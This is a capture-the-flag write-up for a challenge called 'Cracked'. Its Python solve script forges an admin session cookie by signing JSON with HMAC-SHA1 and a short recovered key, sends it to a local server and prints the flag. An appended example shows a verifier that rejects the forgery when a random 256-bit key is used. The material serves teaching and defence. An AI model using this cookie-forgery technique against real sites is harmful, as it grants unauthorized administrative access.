Cracked
Challenge
The session cookie is weakly signed. Forge an admin session by reproducing the server-side HMAC.
Solution
Key solve code:
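import hmac
from base64 import b64encode
from hashlib import sha1

import requests

# HMAC key used to sign the session cookie
KEY = "6lmao9"

# Session payload with the admin flag set
session = '{"admin": 1, "username": "guest"}'

cookies = {
    # HMAC-SHA1 over the raw session JSON, base64-encoded
    "sig": b64encode(hmac.new(KEY.encode(), session.encode(), sha1).digest()).decode(),
    # The session JSON itself, base64-encoded
    "session": b64encode(session.encode()).decode(),
}

print(requests.get("http://localhost:8000", cookies=cookies).text)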
Flag
gigem{maybe_pick_a_better_password_next_time}
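
The server side of this check, as an added example that is not part of the original writeup or the challenge source: a verifier for the same session/sig cookie format, run once with the short key from the solve script and once with a random 256-bit key. The function names, the switch to SHA-256 and the constant-time comparison are assumptions about how a fix could look.

```python
import base64
import hmac
import json
import secrets
from hashlib import sha1, sha256

WEAK_KEY = b"6lmao9"                  # key from the solve script above
STRONG_KEY = secrets.token_bytes(32)  # assumed fix: random 256-bit key


def sign(session_json: str, key: bytes, digest) -> dict:
    """Build the session/sig cookie pair in the format the solve script sends."""
    mac = hmac.new(key, session_json.encode(), digest).digest()
    return {
        "session": base64.b64encode(session_json.encode()).decode(),
        "sig": base64.b64encode(mac).decode(),
    }


def verify(cookies: dict, key: bytes, digest):
    """Return the parsed session if the signature checks out, else None."""
    try:
        raw = base64.b64decode(cookies["session"], validate=True)
        sig = base64.b64decode(cookies["sig"], validate=True)
    except (KeyError, ValueError, TypeError):
        return None  # missing or malformed cookie
    expected = hmac.new(key, raw, digest).digest()
    if not hmac.compare_digest(sig, expected):  # constant-time comparison
        return None
    try:
        return json.loads(raw)
    except ValueError:
        return None  # signed but not valid JSON


def is_admin(cookies: dict, key: bytes, digest) -> bool:
    session = verify(cookies, key, digest)
    return isinstance(session, dict) and session.get("admin") == 1


# Constructed input: the cookie pair the solve script produces.
forged = sign('{"admin": 1, "username": "guest"}', WEAK_KEY, sha1)

if __name__ == "__main__":
    # The key is the decisive part: anyone holding it can mint valid cookies.
    print("weak key accepts forgery:  ", is_admin(forged, WEAK_KEY, sha1))
    print("strong key accepts forgery:", is_admin(forged, STRONG_KEY, sha256))
```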